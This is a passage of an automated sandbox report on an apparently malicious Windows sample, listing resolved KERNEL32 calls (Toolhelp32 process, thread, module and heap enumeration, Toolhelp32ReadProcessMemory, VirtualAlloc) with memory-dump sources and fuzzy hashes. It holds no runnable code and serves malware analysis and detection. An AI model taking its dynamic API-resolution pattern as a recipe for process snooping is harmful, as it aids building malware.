                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004CF38A
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004CF39C
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004CF3AE
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004CF3C0
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004CF3D2
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004CF3E4
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004CF3F6
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004CF408
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004CF41A
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 004CF42C
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 004CF43E
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 004CF450
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004CF462
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004CF474
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004CF486
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF5D9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 2242398760-0
                                                                                                        • Opcode ID: aa5b044c588ddfdc3210c4c3c0d3926e160f7f3b193a84c3919e26267408e9fe
                                                                                                        • Instruction ID: 2367da90766c253f4fab510a59415ecdd71ebaea341184a550cb27389e70fce3
                                                                                                        • Opcode Fuzzy Hash: aa5b044c588ddfdc3210c4c3c0d3926e160f7f3b193a84c3919e26267408e9fe
                                                                                                        • Instruction Fuzzy Hash: 14C080A3601520374A1066F53CC4DC34B4DCD451F63144477B505D3213D62D4C1461A4
                                                                                                        APIs
                                                                                                          • Part of subcall function 004CF34C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004CF5D3,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF360
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004CF378
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004CF38A
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004CF39C
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004CF3AE
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004CF3C0
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004CF3D2
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004CF3E4
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004CF3F6
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004CF408
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004CF41A
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 004CF42C
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 004CF43E
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 004CF450
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004CF462
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004CF474
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004CF486
                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 004CF659
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleModuleNextProcess32
                                                                                                        • String ID:
                                                                                                        • API String ID: 2237597116-0
                                                                                                        • Opcode ID: 8c9a0a4278b6fcd838e880fa5d4eae8115870c90ca26a6c5a323d4618d1d0444
                                                                                                        • Instruction ID: f7a2506f4e2c2bd292fd072077a1b2b4fe2edb9bc32b43aa5964b395e8fa5f96
                                                                                                        • Opcode Fuzzy Hash: 8c9a0a4278b6fcd838e880fa5d4eae8115870c90ca26a6c5a323d4618d1d0444
                                                                                                        • Instruction Fuzzy Hash: F9C080B3301620178F1076F53C84DD34B4DCD491F73040477B505D3212D66D8C046194
                                                                                                        APIs
                                                                                                          • Part of subcall function 004CF34C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004CF5D3,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF360
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004CF378
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004CF38A
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004CF39C
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004CF3AE
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004CF3C0
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004CF3D2
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004CF3E4
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004CF3F6
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004CF408
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004CF41A
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 004CF42C
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 004CF43E
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 004CF450
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004CF462
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004CF474
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004CF486
                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 004CF639
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$FirstHandleModuleProcess32
                                                                                                        • String ID:
                                                                                                        • API String ID: 2774106396-0
                                                                                                        • Opcode ID: 1b2f9cd772ea828f0587b818af3bf864f9015723f77f16aa6c12ecd14a310dd8
                                                                                                        • Instruction ID: cea9194b1bec40b452e46435030e9f6d0a77cd9c208c2d682c677ae1133cc5ba
                                                                                                        • Opcode Fuzzy Hash: 1b2f9cd772ea828f0587b818af3bf864f9015723f77f16aa6c12ecd14a310dd8
                                                                                                        • Instruction Fuzzy Hash: 81C080A3301530174A1076F53C85DD34F4DCD451F63144477B504D3213D66D8C156294

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1286 425bc8-425bcc 1287 425bce-425bdb SysFreeString 1286->1287 1288 425bdc 1286->1288 1287->1288
                                                                                                        APIs
                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00425BD6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeString
                                                                                                        • String ID:
                                                                                                        • API String ID: 3341692771-0
                                                                                                        • Opcode ID: 7f1c94e0d7d00539a662d5e416c93b2d65ca24bdfd2f6e8adb07ea5ed58003b8
                                                                                                        • Instruction ID: 2e196b39daa8764921be558a5a387240bacd155c0bdd8e0ce52a32d021dcfd8b
                                                                                                        • Opcode Fuzzy Hash: 7f1c94e0d7d00539a662d5e416c93b2d65ca24bdfd2f6e8adb07ea5ed58003b8
                                                                                                        • Instruction Fuzzy Hash: 60B092B42022106EE6119B21AC40B27362AABC1711FB9898AA8008A128CB7CAC019628
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitThreadUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 3424019298-0
                                                                                                        • Opcode ID: 289ccbf36f7d9a8ccf60a36875ac77a23cf744902269d9c3177fdf0b5915d927
                                                                                                        • Instruction ID: 714fdd28892cd0eaf32afc09d448c0a52e529b299e21ce259e2126395e5b38a4
                                                                                                        • Opcode Fuzzy Hash: 289ccbf36f7d9a8ccf60a36875ac77a23cf744902269d9c3177fdf0b5915d927
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitThreadUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 3424019298-0
                                                                                                        • Opcode ID: 289ccbf36f7d9a8ccf60a36875ac77a23cf744902269d9c3177fdf0b5915d927
                                                                                                        • Instruction ID: 714fdd28892cd0eaf32afc09d448c0a52e529b299e21ce259e2126395e5b38a4
                                                                                                        • Opcode Fuzzy Hash: 289ccbf36f7d9a8ccf60a36875ac77a23cf744902269d9c3177fdf0b5915d927
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: yymmdd
                                                                                                        • API String ID: 0-2871001947
                                                                                                        • Opcode ID: c2f0850ca05741d5544196295116c66d8b32a17802d8640e374434aa3ec15c18
                                                                                                        • Instruction ID: f15f1b85a0f637e4cae317bac7f6929bfb3b2a163c4115d7559e6a64fae5d6e2
                                                                                                        • Opcode Fuzzy Hash: c2f0850ca05741d5544196295116c66d8b32a17802d8640e374434aa3ec15c18
                                                                                                        • Instruction Fuzzy Hash: 6951E9B5900208EBDB04DFE4DD98BDEBBB8BF48305F108129F506BB6A0DB745A49CB54
                                                                                                        APIs
                                                                                                        • VirtualFree.KERNEL32(?,?,00004000), ref: 00422924
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1263568516-0
                                                                                                        • Opcode ID: 324a51b74da253537b253d891f19afd814ae007f76c7ef41f2610dd7fb034b42
                                                                                                        • Instruction ID: 90b6aa8fc387ceb18a887af8a54e4aae20ad55db79348811f77ef19120a841c5
                                                                                                        • Opcode Fuzzy Hash: 324a51b74da253537b253d891f19afd814ae007f76c7ef41f2610dd7fb034b42
                                                                                                        • Instruction Fuzzy Hash: E02100B4204212DFC750CF28D980A5ABBE4FF99310F60496AE994CB310D371E948CF56
                                                                                                        APIs
                                                                                                        • VirtualFree.KERNEL32(?,?,00004000), ref: 00422924
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1263568516-0
                                                                                                        • Opcode ID: 324a51b74da253537b253d891f19afd814ae007f76c7ef41f2610dd7fb034b42
                                                                                                        • Instruction ID: 90b6aa8fc387ceb18a887af8a54e4aae20ad55db79348811f77ef19120a841c5
                                                                                                        • Opcode Fuzzy Hash: 324a51b74da253537b253d891f19afd814ae007f76c7ef41f2610dd7fb034b42
                                                                                                        • Instruction Fuzzy Hash: E02100B4204212DFC750CF28D980A5ABBE4FF99310F60496AE994CB310D371E948CF56
                                                                                                        APIs
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004229C3), ref: 00422686
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1263568516-0
                                                                                                        • Opcode ID: 247e92d39d1f8c32a233882610808adfe31950c6fd4b9b6067f9f14b00473830
                                                                                                        • Instruction ID: dad5cfe4248d8bab246a3d25b008404abdce35bce64d087442e73adda1e8f828
                                                                                                        • Opcode Fuzzy Hash: 247e92d39d1f8c32a233882610808adfe31950c6fd4b9b6067f9f14b00473830
                                                                                                        • Instruction Fuzzy Hash: DBF02E73B006303BDB20596A5E81B535AC59F95790F950077F948EF3CDD5E98C054399
                                                                                                        APIs
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004229C3), ref: 00422686
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1263568516-0
                                                                                                        • Opcode ID: 247e92d39d1f8c32a233882610808adfe31950c6fd4b9b6067f9f14b00473830
                                                                                                        • Instruction ID: dad5cfe4248d8bab246a3d25b008404abdce35bce64d087442e73adda1e8f828
                                                                                                        • Opcode Fuzzy Hash: 247e92d39d1f8c32a233882610808adfe31950c6fd4b9b6067f9f14b00473830
                                                                                                        • Instruction Fuzzy Hash: DBF02E73B006303BDB20596A5E81B535AC59F95790F950077F948EF3CDD5E98C054399
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0056466B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 3458b433ebb35ab6b83173c0e5f9c4d5c9db5b09a13dfc6663b68e427115ed3f
                                                                                                        • Instruction ID: ad2aa484d1772a38b6f3c9364045a751c64e4889beea1b58f91d59234429b9fb
                                                                                                        • Opcode Fuzzy Hash: 3458b433ebb35ab6b83173c0e5f9c4d5c9db5b09a13dfc6663b68e427115ed3f
                                                                                                        • Instruction Fuzzy Hash: D0E0E2B2300248ABDF24CE8CD884BAB379DB759310F108411FA29D7604C675EC50AB61
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ,4B
                                                                                                        • API String ID: 0-3991844317
                                                                                                        • Opcode ID: 8ff27b8217d493c07472fe6b1d30cc509388e0ea78a9f24c628ca7206849fcec
                                                                                                        • Instruction ID: 2e62f071ec061e269e0af2fbab426198be3a6a271d82a0366f1eceefab834b83
                                                                                                        • Opcode Fuzzy Hash: 8ff27b8217d493c07472fe6b1d30cc509388e0ea78a9f24c628ca7206849fcec
                                                                                                        • Instruction Fuzzy Hash: D7D017B23186208FD3406FA9A89462A77F4AB98312F51183EE0C1C2301D63D89449B16
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a83ff5ffc417f83f4d41acb1b4fd39f3d50246cb43ecf1de3bdcce26b5ed6742
                                                                                                        • Instruction ID: 32f108f087d7d4630656b8080de6af3654730a431ac790d0d60a92850006a6c2
                                                                                                        • Opcode Fuzzy Hash: a83ff5ffc417f83f4d41acb1b4fd39f3d50246cb43ecf1de3bdcce26b5ed6742
                                                                                                        • Instruction Fuzzy Hash: 3A81B5B1D00248EBDB04DFE4DE58BDEBBB4BB48305F10852AE612B76A0DB745A45CB58
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dafe4ae703c94027c61682fa393aab4e794a961f154c1b890746c1e944275571
                                                                                                        • Instruction ID: 73ee6168823af3f290b0d29e05c2a6dbec2158b3bd084ab17ee3d9878e5a0866
                                                                                                        • Opcode Fuzzy Hash: dafe4ae703c94027c61682fa393aab4e794a961f154c1b890746c1e944275571
                                                                                                        • Instruction Fuzzy Hash: 682103B4604256EFC750DF2CD980A5ABBE0FF98350F508A2AF998CB344D374E944CB56
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 816a14491cab5d026b5f441abda892b9675d3a7d8d7b13345878cec3e84f2dc9
                                                                                                        • Instruction ID: d7beefd1e6405fdea3e9c6273c58dc6a0626c210e84cf1c492073799e8a8348a
                                                                                                        • Opcode Fuzzy Hash: 816a14491cab5d026b5f441abda892b9675d3a7d8d7b13345878cec3e84f2dc9
                                                                                                        • Instruction Fuzzy Hash: C201F932B04A149FD7108F59EC8485AFBE8FB05720BA641BBE518D3750E735AC50CAD8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bba16db9fe18d1294021216763c91cb410f3f25e548062a572f5b041e07ffa40
                                                                                                        • Instruction ID: 20dc9a41ebc36c65f54ff828c917c87bbfccee6e827f5727337c9189070ed0dc
                                                                                                        • Opcode Fuzzy Hash: bba16db9fe18d1294021216763c91cb410f3f25e548062a572f5b041e07ffa40
                                                                                                        • Instruction Fuzzy Hash: 05015EB1900205AFCB149FA8C94AB6E7BB8EB44700F50453AF555F3290D73899458B99
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
